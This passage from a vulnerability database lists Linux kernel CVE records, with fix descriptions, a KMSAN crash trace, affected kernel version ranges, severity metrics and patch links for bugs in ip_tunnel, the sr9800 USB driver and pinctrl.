"url": "https://git.kernel.org/stable/c/72c1efe3f247a581667b7d368fff3bd9a03cd57a"
},
{
"url": "https://git.kernel.org/stable/c/c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12"
},
{
"url": "https://git.kernel.org/stable/c/8e07c16695583a66e81f67ce4c46e94dece47ba7"
},
{
"url": "https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1"
}
],
"title": "netfilter: nf_tables: disallow anonymous set with timeout flag",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26642",
"datePublished": "2024-03-21T10:43:43.495Z",
"dateReserved": "2024-02-19T14:20:24.137Z",
"dateUpdated": "2025-05-04T08:52:55.435Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26882 (GCVE-0-2024-26882)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ip_tunnel: make sure to pull inner header in ip_tunnel_rcv()
Apply the same fix than ones found in :
8d975c15c0cd ("ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()")
1ca1ba465e55 ("geneve: make sure to pull inner header in geneve_rx()")
We have to save skb->network_header in a temporary variable
in order to be able to recompute the network_header pointer
after a pskb_inet_may_pull() call.
pskb_inet_may_pull() makes sure the needed headers are in skb->head.
syzbot reported:
BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]
BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]
BUG: KMSAN: uninit-value in IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]
BUG: KMSAN: uninit-value in ip_tunnel_rcv+0xed9/0x2ed0 net/ipv4/ip_tunnel.c:409
__INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]
INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]
IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]
ip_tunnel_rcv+0xed9/0x2ed0 net/ipv4/ip_tunnel.c:409
__ipgre_rcv+0x9bc/0xbc0 net/ipv4/ip_gre.c:389
ipgre_rcv net/ipv4/ip_gre.c:411 [inline]
gre_rcv+0x423/0x19f0 net/ipv4/ip_gre.c:447
gre_rcv+0x2a4/0x390 net/ipv4/gre_demux.c:163
ip_protocol_deliver_rcu+0x264/0x1300 net/ipv4/ip_input.c:205
ip_local_deliver_finish+0x2b8/0x440 net/ipv4/ip_input.c:233
NF_HOOK include/linux/netfilter.h:314 [inline]
ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254
dst_input include/net/dst.h:461 [inline]
ip_rcv_finish net/ipv4/ip_input.c:449 [inline]
NF_HOOK include/linux/netfilter.h:314 [inline]
ip_rcv+0x46f/0x760 net/ipv4/ip_input.c:569
__netif_receive_skb_one_core net/core/dev.c:5534 [inline]
__netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5648
netif_receive_skb_internal net/core/dev.c:5734 [inline]
netif_receive_skb+0x58/0x660 net/core/dev.c:5793
tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1556
tun_get_user+0x53b9/0x66e0 drivers/net/tun.c:2009
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2055
call_write_iter include/linux/fs.h:2087 [inline]
new_sync_write fs/read_write.c:497 [inline]
vfs_write+0xb6b/0x1520 fs/read_write.c:590
ksys_write+0x20f/0x4c0 fs/read_write.c:643
__do_sys_write fs/read_write.c:655 [inline]
__se_sys_write fs/read_write.c:652 [inline]
__x64_sys_write+0x93/0xd0 fs/read_write.c:652
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
__alloc_pages+0x9a6/0xe00 mm/page_alloc.c:4590
alloc_pages_mpol+0x62b/0x9d0 mm/mempolicy.c:2133
alloc_pages+0x1be/0x1e0 mm/mempolicy.c:2204
skb_page_frag_refill+0x2bf/0x7c0 net/core/sock.c:2909
tun_build_skb drivers/net/tun.c:1686 [inline]
tun_get_user+0xe0a/0x66e0 drivers/net/tun.c:1826
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2055
call_write_iter include/linux/fs.h:2087 [inline]
new_sync_write fs/read_write.c:497 [inline]
vfs_write+0xb6b/0x1520 fs/read_write.c:590
ksys_write+0x20f/0x4c0 fs/read_write.c:643
__do_sys_write fs/read_write.c:655 [inline]
__se_sys_write fs/read_write.c:652 [inline]
__x64_sys_write+0x93/0xd0 fs/read_write.c:652
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 Version: c54419321455631079c7d6e60bc732dd0c5914c5 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26882",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-16T18:00:36.614107Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-08T21:14:07.724Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-12-20T13:06:43.371Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec6bb01e02cbd47781dd90775b631a1dc4bd9d2b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/77fd5294ea09b21f6772ac954a121b87323cec80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c03387021cfa3336b97e0dcba38029917a8af2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/60044ab84836359534bd7153b92e9c1584140e4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c4c857723b37c20651300b3de4ff25059848b4b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6723d8dbfdc10c784a56748f86a9a3cd410dbd5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca914f1cdee8a85799942c9b0ce5015bbd6844e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0ec2abf98267f14d032102551581c833b0659d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241220-0002/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ec6bb01e02cbd47781dd90775b631a1dc4bd9d2b",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "77fd5294ea09b21f6772ac954a121b87323cec80",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "5c03387021cfa3336b97e0dcba38029917a8af2a",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "60044ab84836359534bd7153b92e9c1584140e4a",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "c4c857723b37c20651300b3de4ff25059848b4b0",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "f6723d8dbfdc10c784a56748f86a9a3cd410dbd5",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "ca914f1cdee8a85799942c9b0ce5015bbd6844e1",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
},
{
"lessThan": "b0ec2abf98267f14d032102551581c833b0659d3",
"status": "affected",
"version": "c54419321455631079c7d6e60bc732dd0c5914c5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.10"
},
{
"lessThan": "3.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ip_tunnel: make sure to pull inner header in ip_tunnel_rcv()\n\nApply the same fix than ones found in :\n\n8d975c15c0cd (\"ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()\")\n1ca1ba465e55 (\"geneve: make sure to pull inner header in geneve_rx()\")\n\nWe have to save skb-\u003enetwork_header in a temporary variable\nin order to be able to recompute the network_header pointer\nafter a pskb_inet_may_pull() call.\n\npskb_inet_may_pull() makes sure the needed headers are in skb-\u003ehead.\n\nsyzbot reported:\nBUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n BUG: KMSAN: uninit-value in IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]\n BUG: KMSAN: uninit-value in ip_tunnel_rcv+0xed9/0x2ed0 net/ipv4/ip_tunnel.c:409\n __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]\n ip_tunnel_rcv+0xed9/0x2ed0 net/ipv4/ip_tunnel.c:409\n __ipgre_rcv+0x9bc/0xbc0 net/ipv4/ip_gre.c:389\n ipgre_rcv net/ipv4/ip_gre.c:411 [inline]\n gre_rcv+0x423/0x19f0 net/ipv4/ip_gre.c:447\n gre_rcv+0x2a4/0x390 net/ipv4/gre_demux.c:163\n ip_protocol_deliver_rcu+0x264/0x1300 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x2b8/0x440 net/ipv4/ip_input.c:233\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254\n dst_input include/net/dst.h:461 [inline]\n ip_rcv_finish net/ipv4/ip_input.c:449 [inline]\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ip_rcv+0x46f/0x760 net/ipv4/ip_input.c:569\n __netif_receive_skb_one_core net/core/dev.c:5534 [inline]\n __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5648\n netif_receive_skb_internal net/core/dev.c:5734 [inline]\n netif_receive_skb+0x58/0x660 net/core/dev.c:5793\n tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1556\n tun_get_user+0x53b9/0x66e0 drivers/net/tun.c:2009\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2055\n call_write_iter include/linux/fs.h:2087 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0xb6b/0x1520 fs/read_write.c:590\n ksys_write+0x20f/0x4c0 fs/read_write.c:643\n __do_sys_write fs/read_write.c:655 [inline]\n __se_sys_write fs/read_write.c:652 [inline]\n __x64_sys_write+0x93/0xd0 fs/read_write.c:652\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n __alloc_pages+0x9a6/0xe00 mm/page_alloc.c:4590\n alloc_pages_mpol+0x62b/0x9d0 mm/mempolicy.c:2133\n alloc_pages+0x1be/0x1e0 mm/mempolicy.c:2204\n skb_page_frag_refill+0x2bf/0x7c0 net/core/sock.c:2909\n tun_build_skb drivers/net/tun.c:1686 [inline]\n tun_get_user+0xe0a/0x66e0 drivers/net/tun.c:1826\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2055\n call_write_iter include/linux/fs.h:2087 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0xb6b/0x1520 fs/read_write.c:590\n ksys_write+0x20f/0x4c0 fs/read_write.c:643\n __do_sys_write fs/read_write.c:655 [inline]\n __se_sys_write fs/read_write.c:652 [inline]\n __x64_sys_write+0x93/0xd0 fs/read_write.c:652\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:47.122Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ec6bb01e02cbd47781dd90775b631a1dc4bd9d2b"
},
{
"url": "https://git.kernel.org/stable/c/77fd5294ea09b21f6772ac954a121b87323cec80"
},
{
"url": "https://git.kernel.org/stable/c/5c03387021cfa3336b97e0dcba38029917a8af2a"
},
{
"url": "https://git.kernel.org/stable/c/60044ab84836359534bd7153b92e9c1584140e4a"
},
{
"url": "https://git.kernel.org/stable/c/c4c857723b37c20651300b3de4ff25059848b4b0"
},
{
"url": "https://git.kernel.org/stable/c/f6723d8dbfdc10c784a56748f86a9a3cd410dbd5"
},
{
"url": "https://git.kernel.org/stable/c/ca914f1cdee8a85799942c9b0ce5015bbd6844e1"
},
{
"url": "https://git.kernel.org/stable/c/b0ec2abf98267f14d032102551581c833b0659d3"
}
],
"title": "net: ip_tunnel: make sure to pull inner header in ip_tunnel_rcv()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26882",
"datePublished": "2024-04-17T10:27:38.389Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:47.122Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26651 (GCVE-0-2024-26651)
Vulnerability from cvelistv5
Published
2024-03-27 13:50
Modified
2025-11-04 22:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sr9800: Add check for usbnet_get_endpoints
Add check for usbnet_get_endpoints() and return the error if it fails
in order to transfer the error.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 Version: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26651",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:07:09.943432Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:07:20.055Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T22:05:59.931Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/424eba06ed405d557077339edb19ce0ebe39e7c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a8b6a24684bc278036c3f159f7b3a31ad89546a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b4a39acafaf0186ed8e97c16e0aa6fca0e52009"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/276873ae26c8d75b00747c1dadb9561d6ef20581"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c402819620a842cbfe39359a3ddfaac9adc8384"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e39a3a14eafcf17f03c037290b78c8f483529028"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/efba65777f98457773c5b65e3135c6132d3b015f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f546cc19f9b82975238d0ba413adc27714750774"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07161b2416f740a2cb87faa5566873f401440a61"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AXURWFKAKFEIUBN7RTCXI7GZYAHXNBX5/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SI2D7K2T6QCWALKLYEWZ22P4UXMEBCGB/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/sr9800.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "424eba06ed405d557077339edb19ce0ebe39e7c7",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "8a8b6a24684bc278036c3f159f7b3a31ad89546a",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "6b4a39acafaf0186ed8e97c16e0aa6fca0e52009",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "276873ae26c8d75b00747c1dadb9561d6ef20581",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "9c402819620a842cbfe39359a3ddfaac9adc8384",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "e39a3a14eafcf17f03c037290b78c8f483529028",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "efba65777f98457773c5b65e3135c6132d3b015f",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "f546cc19f9b82975238d0ba413adc27714750774",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
},
{
"lessThan": "07161b2416f740a2cb87faa5566873f401440a61",
"status": "affected",
"version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/sr9800.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.14"
},
{
"lessThan": "3.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsr9800: Add check for usbnet_get_endpoints\n\nAdd check for usbnet_get_endpoints() and return the error if it fails\nin order to transfer the error."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:07.161Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/424eba06ed405d557077339edb19ce0ebe39e7c7"
},
{
"url": "https://git.kernel.org/stable/c/8a8b6a24684bc278036c3f159f7b3a31ad89546a"
},
{
"url": "https://git.kernel.org/stable/c/6b4a39acafaf0186ed8e97c16e0aa6fca0e52009"
},
{
"url": "https://git.kernel.org/stable/c/276873ae26c8d75b00747c1dadb9561d6ef20581"
},
{
"url": "https://git.kernel.org/stable/c/9c402819620a842cbfe39359a3ddfaac9adc8384"
},
{
"url": "https://git.kernel.org/stable/c/e39a3a14eafcf17f03c037290b78c8f483529028"
},
{
"url": "https://git.kernel.org/stable/c/efba65777f98457773c5b65e3135c6132d3b015f"
},
{
"url": "https://git.kernel.org/stable/c/f546cc19f9b82975238d0ba413adc27714750774"
},
{
"url": "https://git.kernel.org/stable/c/07161b2416f740a2cb87faa5566873f401440a61"
}
],
"title": "sr9800: Add check for usbnet_get_endpoints",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26651",
"datePublished": "2024-03-27T13:50:50.833Z",
"dateReserved": "2024-02-19T14:20:24.143Z",
"dateUpdated": "2025-11-04T22:05:59.931Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-36959 (GCVE-0-2024-36959)
Vulnerability from cvelistv5
Published
2024-05-30 15:35
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: devicetree: fix refcount leak in pinctrl_dt_to_map()
If we fail to allocate propname buffer, we need to drop the reference
count we just took. Because the pinctrl_dt_free_maps() includes the
droping operation, here we call it directly.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
